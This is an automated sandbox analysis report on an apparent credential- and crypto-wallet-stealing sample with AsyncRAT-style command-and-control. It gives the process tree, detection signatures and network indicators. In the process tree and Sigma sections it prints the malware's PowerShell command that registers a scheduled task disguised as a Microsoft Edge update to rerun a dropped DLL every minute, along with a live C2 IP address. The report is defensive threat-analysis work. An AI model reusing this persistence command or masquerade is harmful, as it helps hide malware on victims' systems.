Edit tour

Windows Analysis Report
8n26gvrXUM.exe

Overview

General Information

Sample name:	8n26gvrXUM.exe renamed because original name is a hash value
Original sample name:	c6f9f0ec394a72fb302efbcf74da2ea7.exe
Analysis ID:	1583336
MD5:	c6f9f0ec394a72fb302efbcf74da2ea7
SHA1:	143c8fe025fbfd0afe9c88003315bc5a4720439a
SHA256:	0a63068ec9d94fef476d9e906fb4920de32e70b77daa24a8b2a0786f23889a1a
Tags:	exeuser-abuse_ch
Infos:

Detection

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Powershell launch regsvr32

Suricata IDS alerts for network traffic

System process connects to network (likely due to code injection or exploit)

.NET source code contains very large array initializations

AI detected suspicious sample

Found many strings related to Crypto-Wallets (likely being stolen)

Loading BitLocker PowerShell Module

Queries memory information (via WMI often done to detect virtual machines)

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)

Sets debug register (to hijack the execution of another thread)

Sigma detected: Potentially Suspicious Child Process Of Regsvr32

Suspicious powershell command line found

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal Bitcoin Wallet information

Uses Register-ScheduledTask to add task schedules

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to call native functions

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to dynamically determine API calls

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains executable resources (Code or Archives)

PE file contains more sections than normal

PE file contains sections with non-standard names

Queries keyboard layouts

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: Network Connection Initiated By Regsvr32.EXE

Sigma detected: Potential Regsvr32 Commandline Flag Anomaly

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

8n26gvrXUM.exe (PID: 1948 cmdline: "C:\Users\user\Desktop\8n26gvrXUM.exe" MD5: C6F9F0EC394A72FB302EFBCF74DA2EA7)

8n26gvrXUM.tmp (PID: 6664 cmdline: "C:\Users\user\AppData\Local\Temp\is-HOBDA.tmp\8n26gvrXUM.tmp" /SL5="$203E2,1083099,161792,C:\Users\user\Desktop\8n26gvrXUM.exe" MD5: BCC236A3921E1388596A42B05686FF5E)

cmd.exe (PID: 4156 cmdline: "cmd.exe" /C timeout /T 3 & "C:\Users\user\Desktop\8n26gvrXUM.exe" /VERYSILENT /SUPPRESSMSGBOXES MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 2356 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

timeout.exe (PID: 3428 cmdline: timeout /T 3 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

8n26gvrXUM.exe (PID: 1584 cmdline: "C:\Users\user\Desktop\8n26gvrXUM.exe" /VERYSILENT /SUPPRESSMSGBOXES MD5: C6F9F0EC394A72FB302EFBCF74DA2EA7)

8n26gvrXUM.tmp (PID: 2548 cmdline: "C:\Users\user\AppData\Local\Temp\is-JDMAQ.tmp\8n26gvrXUM.tmp" /SL5="$30426,1083099,161792,C:\Users\user\Desktop\8n26gvrXUM.exe" /VERYSILENT /SUPPRESSMSGBOXES MD5: BCC236A3921E1388596A42B05686FF5E)

regsvr32.exe (PID: 1664 cmdline: "regsvr32.exe" /s /i:SYNC "C:\Users\user\AppData\Roaming\\netapi32_1.drv" MD5: 878E47C8656E53AE8A8A21E927C6F7E0)

regsvr32.exe (PID: 796 cmdline: /s /i:SYNC "C:\Users\user\AppData\Roaming\\netapi32_1.drv" MD5: B0C2FA35D14A9FAD919E99D9D75E1B9E)

powershell.exe (PID: 6408 cmdline: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\netapi32_1.drv' }) { exit 0 } else { exit 1 }" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 3224 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 6084 cmdline: "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/S /i:SYNC C:\Users\user\AppData\Roaming\netapi32_1.drv\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{D26AEDB2-54A1-4069-8CFB-595FFA7EE9CA}' -Description 'MicrosoftEdgeUpdateTaskMachineUA' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -ExecutionTimeLimit 0) -RunLevel Highest" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 6524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

regsvr32.exe (PID: 2724 cmdline: C:\Windows\system32\regsvr32.EXE /S /i:SYNC C:\Users\user\AppData\Roaming\netapi32_1.drv MD5: B0C2FA35D14A9FAD919E99D9D75E1B9E)

powershell.exe (PID: 5352 cmdline: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\netapi32_1.drv' }) { exit 0 } else { exit 1 }" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 5824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000009.00000002.3362190126.00000000032F8000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: regsvr32.exe PID: 796	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security

Sigma Signatures

System Summary

Sigma detected: Potentially Suspicious Child Process Of Regsvr32

Source: Process started

Author: elhoim, Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\netapi32_1.drv' }) { exit 0 } else { exit 1 }", CommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\netapi32_1.drv' }) { exit 0 } else { exit 1 }", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: /s /i:SYNC "C:\Users\user\AppData\Roaming\\netapi32_1.drv", ParentImage: C:\Windows\System32\regsvr32.exe, ParentProcessId: 796, ParentProcessName: regsvr32.exe, ProcessCommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\netapi32_1.drv' }) { exit 0 } else { exit 1 }", ProcessId: 6408, ProcessName: powershell.exe

Sigma detected: Network Connection Initiated By Regsvr32.EXE

Source: Network Connection

Author: Dmitriy Lifanov, oscd.community: Data: DestinationIp: 144.202.34.112, DestinationIsIpv6: false, DestinationPort: 56001, EventID: 3, Image: C:\Windows\System32\regsvr32.exe, Initiated: true, ProcessId: 796, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49952

Sigma detected: Potential Regsvr32 Commandline Flag Anomaly

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "regsvr32.exe" /s /i:SYNC "C:\Users\user\AppData\Roaming\\netapi32_1.drv", CommandLine: "regsvr32.exe" /s /i:SYNC "C:\Users\user\AppData\Roaming\\netapi32_1.drv", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-JDMAQ.tmp\8n26gvrXUM.tmp" /SL5="$30426,1083099,161792,C:\Users\user\Desktop\8n26gvrXUM.exe" /VERYSILENT /SUPPRESSMSGBOXES, ParentImage: C:\Users\user\AppData\Local\Temp\is-JDMAQ.tmp\8n26gvrXUM.tmp, ParentProcessId: 2548, ParentProcessName: 8n26gvrXUM.tmp, ProcessCommandLine: "regsvr32.exe" /s /i:SYNC "C:\Users\user\AppData\Roaming\\netapi32_1.drv", ProcessId: 1664, ProcessName: regsvr32.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\netapi32_1.drv' }) { exit 0 } else { exit 1 }", CommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\netapi32_1.drv' }) { exit 0 } else { exit 1 }", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: /s /i:SYNC "C:\Users\user\AppData\Roaming\\netapi32_1.drv", ParentImage: C:\Windows\System32\regsvr32.exe, ParentProcessId: 796, ParentProcessName: regsvr32.exe, ProcessCommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\netapi32_1.drv' }) { exit 0 } else { exit 1 }", ProcessId: 6408, ProcessName: powershell.exe

HIPS / PFW / Operating System Protection Evasion

Sigma detected: Powershell launch regsvr32

Source: Process started

Author: Joe Security: Data: Command: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\netapi32_1.drv' }) { exit 0 } else { exit 1 }", CommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\netapi32_1.drv' }) { exit 0 } else { exit 1 }", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: /s /i:SYNC "C:\Users\user\AppData\Roaming\\netapi32_1.drv", ParentImage: C:\Windows\System32\regsvr32.exe, ParentProcessId: 796, ParentProcessName: regsvr32.exe, ProcessCommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\netapi32_1.drv' }) { exit 0 } else { exit 1 }", ProcessId: 6408, ProcessName: powershell.exe

Suricata Signatures

ET MALWARE Generic AsyncRAT Style SSL Cert

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-02T13:54:49.264763+0100	2035595	1	Domain Observed Used for C2 Detected	144.202.34.112	56001	192.168.2.6	49952	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\is-66O79.tmp	ReversingLabs: Detection: 43%
Source: C:\Users\user\AppData\Roaming\netapi32_1.drv (copy)	ReversingLabs: Detection: 43%

Multi AV Scanner detection for submitted file

Source: 8n26gvrXUM.exe	ReversingLabs: Detection: 50%
Source: 8n26gvrXUM.exe	Virustotal: Detection: 55%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.8% probability

Source: C:\Windows\System32\regsvr32.exe	Code function: 9_2_00007FFDA339A1B0 BCryptGenRandom,SystemFunction036,		9_2_00007FFDA339A1B0
Source: C:\Windows\System32\regsvr32.exe	Code function: 15_2_00007FFDA339A1B0 BCryptGenRandom,SystemFunction036,		15_2_00007FFDA339A1B0

Source: 8n26gvrXUM.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: C:\Users\user\AppData\Local\Temp\is-JDMAQ.tmp\8n26gvrXUM.tmp

Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Grubby Farm_is1

Jump to behavior

Source:

Binary string: c:\zlib-dll\Release\isunzlib.pdb source: 8n26gvrXUM.tmp, 00000002.00000002.2158813120.0000000002443000.00000002.00000001.01000000.00000006.sdmp, 8n26gvrXUM.tmp, 00000002.00000003.2117453704.00000000031C0000.00000004.00001000.00020000.00000000.sdmp, 8n26gvrXUM.tmp, 00000007.00000003.2152811712.0000000003618000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.2.dr, _isdecmp.dll.7.dr

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2035595 - Severity 1 - ET MALWARE Generic AsyncRAT Style SSL Cert : 144.202.34.112:56001 -> 192.168.2.6:49952

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\regsvr32.exe

Network Connect: 144.202.34.112 56001

Jump to behavior

Source: global traffic

TCP traffic: 192.168.2.6:49952 -> 144.202.34.112:56001

Source: Joe Sandbox View

ASN Name: AS-CHOOPAUS AS-CHOOPAUS

Source: unknown	TCP traffic detected without corresponding DNS query: 144.202.34.112
Source: unknown	TCP traffic detected without corresponding DNS query: 144.202.34.112
Source: unknown	TCP traffic detected without corresponding DNS query: 144.202.34.112
Source: unknown	TCP traffic detected without corresponding DNS query: 144.202.34.112
Source: unknown	TCP traffic detected without corresponding DNS query: 144.202.34.112
Source: unknown	TCP traffic detected without corresponding DNS query: 144.202.34.112
Source: unknown	TCP traffic detected without corresponding DNS query: 144.202.34.112
Source: unknown	TCP traffic detected without corresponding DNS query: 144.202.34.112
Source: unknown	TCP traffic detected without corresponding DNS query: 144.202.34.112
Source: unknown	TCP traffic detected without corresponding DNS query: 144.202.34.112
Source: unknown	TCP traffic detected without corresponding DNS query: 144.202.34.112
Source: unknown	TCP traffic detected without corresponding DNS query: 144.202.34.112
Source: unknown	TCP traffic detected without corresponding DNS query: 144.202.34.112
Source: unknown	TCP traffic detected without corresponding DNS query: 144.202.34.112
Source: unknown	TCP traffic detected without corresponding DNS query: 144.202.34.112
Source: unknown	TCP traffic detected without corresponding DNS query: 144.202.34.112
Source: unknown	TCP traffic detected without corresponding DNS query: 144.202.34.112
Source: unknown	TCP traffic detected without corresponding DNS query: 144.202.34.112
Source: unknown	TCP traffic detected without corresponding DNS query: 144.202.34.112
Source: unknown	TCP traffic detected without corresponding DNS query: 144.202.34.112
Source: unknown	TCP traffic detected without corresponding DNS query: 144.202.34.112
Source: unknown	TCP traffic detected without corresponding DNS query: 144.202.34.112
Source: unknown	TCP traffic detected without corresponding DNS query: 144.202.34.112
Source: unknown	TCP traffic detected without corresponding DNS query: 144.202.34.112
Source: unknown	TCP traffic detected without corresponding DNS query: 144.202.34.112
Source: unknown	TCP traffic detected without corresponding DNS query: 144.202.34.112

Source: 8n26gvrXUM.tmp, 00000007.00000003.2152811712.00000000035BE000.00000004.00001000.00020000.00000000.sdmp, 8n26gvrXUM.tmp, 00000007.00000002.2154045511.000000000018F000.00000004.00000010.00020000.00000000.sdmp, is-66O79.tmp.7.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
Source: 8n26gvrXUM.tmp, 00000007.00000003.2152811712.00000000035BE000.00000004.00001000.00020000.00000000.sdmp, 8n26gvrXUM.tmp, 00000007.00000002.2154045511.000000000018F000.00000004.00000010.00020000.00000000.sdmp, is-66O79.tmp.7.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: 8n26gvrXUM.tmp, 00000007.00000003.2152811712.00000000035BE000.00000004.00001000.00020000.00000000.sdmp, 8n26gvrXUM.tmp, 00000007.00000002.2154045511.000000000018F000.00000004.00000010.00020000.00000000.sdmp, is-66O79.tmp.7.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceCodeSigningCA-1.crt0
Source: 8n26gvrXUM.tmp, 00000007.00000003.2152811712.00000000035BE000.00000004.00001000.00020000.00000000.sdmp, 8n26gvrXUM.tmp, 00000007.00000002.2154045511.000000000018F000.00000004.00000010.00020000.00000000.sdmp, is-66O79.tmp.7.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: powershell.exe, 0000000A.00000002.2248762507.0000011CF9AEF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.m
Source: 8n26gvrXUM.tmp, 00000007.00000003.2152811712.00000000035BE000.00000004.00001000.00020000.00000000.sdmp, 8n26gvrXUM.tmp, 00000007.00000002.2154045511.000000000018F000.00000004.00000010.00020000.00000000.sdmp, is-66O79.tmp.7.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
Source: 8n26gvrXUM.tmp, 00000007.00000003.2152811712.00000000035BE000.00000004.00001000.00020000.00000000.sdmp, 8n26gvrXUM.tmp, 00000007.00000002.2154045511.000000000018F000.00000004.00000010.00020000.00000000.sdmp, is-66O79.tmp.7.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: 8n26gvrXUM.tmp, 00000007.00000003.2152811712.00000000035BE000.00000004.00001000.00020000.00000000.sdmp, 8n26gvrXUM.tmp, 00000007.00000002.2154045511.000000000018F000.00000004.00000010.00020000.00000000.sdmp, is-66O79.tmp.7.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: 8n26gvrXUM.tmp, 00000007.00000003.2152811712.00000000035BE000.00000004.00001000.00020000.00000000.sdmp, 8n26gvrXUM.tmp, 00000007.00000002.2154045511.000000000018F000.00000004.00000010.00020000.00000000.sdmp, is-66O79.tmp.7.dr	String found in binary or memory: http://crl3.digicert.com/ha-cs-2011a.crl0.
Source: 8n26gvrXUM.tmp, 00000007.00000003.2152811712.00000000035BE000.00000004.00001000.00020000.00000000.sdmp, 8n26gvrXUM.tmp, 00000007.00000002.2154045511.000000000018F000.00000004.00000010.00020000.00000000.sdmp, is-66O79.tmp.7.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
Source: 8n26gvrXUM.tmp, 00000007.00000003.2152811712.00000000035BE000.00000004.00001000.00020000.00000000.sdmp, 8n26gvrXUM.tmp, 00000007.00000002.2154045511.000000000018F000.00000004.00000010.00020000.00000000.sdmp, is-66O79.tmp.7.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: 8n26gvrXUM.tmp, 00000007.00000003.2152811712.00000000035BE000.00000004.00001000.00020000.00000000.sdmp, 8n26gvrXUM.tmp, 00000007.00000002.2154045511.000000000018F000.00000004.00000010.00020000.00000000.sdmp, is-66O79.tmp.7.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: 8n26gvrXUM.tmp, 00000007.00000003.2152811712.00000000035BE000.00000004.00001000.00020000.00000000.sdmp, 8n26gvrXUM.tmp, 00000007.00000002.2154045511.000000000018F000.00000004.00000010.00020000.00000000.sdmp, is-66O79.tmp.7.dr	String found in binary or memory: http://crl4.digicert.com/ha-cs-2011a.crl0L
Source: regsvr32.exe, 00000009.00000002.3361578425.0000000003160000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabK
Source: regsvr32.exe, 00000009.00000002.3361578425.0000000003189000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enig
Source: powershell.exe, 0000000A.00000002.2240229224.0000011CF15FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2365576067.000001471006F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2561315614.00000254DB37F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: 8n26gvrXUM.tmp, 00000007.00000003.2152811712.00000000035BE000.00000004.00001000.00020000.00000000.sdmp, 8n26gvrXUM.tmp, 00000007.00000002.2154045511.000000000018F000.00000004.00000010.00020000.00000000.sdmp, is-66O79.tmp.7.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: 8n26gvrXUM.tmp, 00000007.00000003.2152811712.00000000035BE000.00000004.00001000.00020000.00000000.sdmp, 8n26gvrXUM.tmp, 00000007.00000002.2154045511.000000000018F000.00000004.00000010.00020000.00000000.sdmp, is-66O79.tmp.7.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: 8n26gvrXUM.tmp, 00000007.00000003.2152811712.00000000035BE000.00000004.00001000.00020000.00000000.sdmp, 8n26gvrXUM.tmp, 00000007.00000002.2154045511.000000000018F000.00000004.00000010.00020000.00000000.sdmp, is-66O79.tmp.7.dr	String found in binary or memory: http://ocsp.digicert.com0I
Source: 8n26gvrXUM.tmp, 00000007.00000003.2152811712.00000000035BE000.00000004.00001000.00020000.00000000.sdmp, 8n26gvrXUM.tmp, 00000007.00000002.2154045511.000000000018F000.00000004.00000010.00020000.00000000.sdmp, is-66O79.tmp.7.dr	String found in binary or memory: http://ocsp.digicert.com0P
Source: powershell.exe, 00000010.00000002.2407948865.00000254CB539000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: 8n26gvrXUM.tmp, 00000007.00000002.2154045511.000000000018F000.00000004.00000010.00020000.00000000.sdmp, is-66O79.tmp.7.dr	String found in binary or memory: http://rb.symcb.com/rb.crl0W
Source: 8n26gvrXUM.tmp, 00000007.00000002.2154045511.000000000018F000.00000004.00000010.00020000.00000000.sdmp, is-66O79.tmp.7.dr	String found in binary or memory: http://rb.symcb.com/rb.crt0
Source: 8n26gvrXUM.tmp, 00000007.00000002.2154045511.000000000018F000.00000004.00000010.00020000.00000000.sdmp, is-66O79.tmp.7.dr	String found in binary or memory: http://rb.symcd.com0&
Source: 8n26gvrXUM.tmp, 00000007.00000002.2154045511.000000000018F000.00000004.00000010.00020000.00000000.sdmp, is-66O79.tmp.7.dr	String found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: 8n26gvrXUM.tmp, 00000007.00000002.2154045511.000000000018F000.00000004.00000010.00020000.00000000.sdmp, is-66O79.tmp.7.dr	String found in binary or memory: http://s.symcd.com0
Source: 8n26gvrXUM.tmp, 00000007.00000002.2154045511.000000000018F000.00000004.00000010.00020000.00000000.sdmp, is-66O79.tmp.7.dr	String found in binary or memory: http://s.symcd.com06
Source: powershell.exe, 0000000A.00000002.2207941559.0000011CE17B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2279590786.0000014700228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2407948865.00000254CB539000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: regsvr32.exe, 00000009.00000002.3362190126.000000000371A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2207941559.0000011CE1591000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2279590786.0000014700001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2407948865.00000254CB311000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000A.00000002.2207941559.0000011CE17B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2279590786.0000014700228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2407948865.00000254CB539000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: 8n26gvrXUM.tmp, 00000007.00000002.2154045511.000000000018F000.00000004.00000010.00020000.00000000.sdmp, is-66O79.tmp.7.dr	String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: 8n26gvrXUM.tmp, 00000007.00000002.2154045511.000000000018F000.00000004.00000010.00020000.00000000.sdmp, is-66O79.tmp.7.dr	String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: 8n26gvrXUM.tmp, 00000007.00000002.2154045511.000000000018F000.00000004.00000010.00020000.00000000.sdmp, is-66O79.tmp.7.dr	String found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: powershell.exe, 00000010.00000002.2407948865.00000254CB539000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: 8n26gvrXUM.tmp, 00000007.00000003.2152811712.00000000035BE000.00000004.00001000.00020000.00000000.sdmp, 8n26gvrXUM.tmp, 00000007.00000002.2154045511.000000000018F000.00000004.00000010.00020000.00000000.sdmp, is-66O79.tmp.7.dr	String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: 8n26gvrXUM.exe, 00000000.00000003.2115407999.00000000023F0000.00000004.00001000.00020000.00000000.sdmp, 8n26gvrXUM.exe, 00000000.00000003.2115978874.000000007FD20000.00000004.00001000.00020000.00000000.sdmp, 8n26gvrXUM.tmp, 00000002.00000000.2116583250.0000000000401000.00000020.00000001.01000000.00000004.sdmp, 8n26gvrXUM.tmp.0.dr, is-O7IBF.tmp.7.dr, 8n26gvrXUM.tmp.6.dr	String found in binary or memory: http://www.innosetup.com/
Source: 8n26gvrXUM.exe, 00000000.00000003.2115407999.00000000023F0000.00000004.00001000.00020000.00000000.sdmp, 8n26gvrXUM.exe, 00000000.00000003.2115978874.000000007FD20000.00000004.00001000.00020000.00000000.sdmp, 8n26gvrXUM.tmp, 00000002.00000000.2116583250.0000000000401000.00000020.00000001.01000000.00000004.sdmp, 8n26gvrXUM.tmp.0.dr, is-O7IBF.tmp.7.dr, 8n26gvrXUM.tmp.6.dr	String found in binary or memory: http://www.remobjects.com/ps
Source: powershell.exe, 0000000A.00000002.2207941559.0000011CE1591000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2279590786.0000014700001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2407948865.00000254CB311000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000010.00000002.2407948865.00000254CB539000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: powershell.exe, 00000010.00000002.2561315614.00000254DB37F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000010.00000002.2561315614.00000254DB37F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000010.00000002.2561315614.00000254DB37F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: 8n26gvrXUM.tmp, 00000007.00000002.2154045511.000000000018F000.00000004.00000010.00020000.00000000.sdmp, is-66O79.tmp.7.dr	String found in binary or memory: https://d.symcb.com/cps0%
Source: is-66O79.tmp.7.dr	String found in binary or memory: https://d.symcb.com/rpa0
Source: 8n26gvrXUM.tmp, 00000007.00000002.2154045511.000000000018F000.00000004.00000010.00020000.00000000.sdmp, is-66O79.tmp.7.dr	String found in binary or memory: https://d.symcb.com/rpa0.
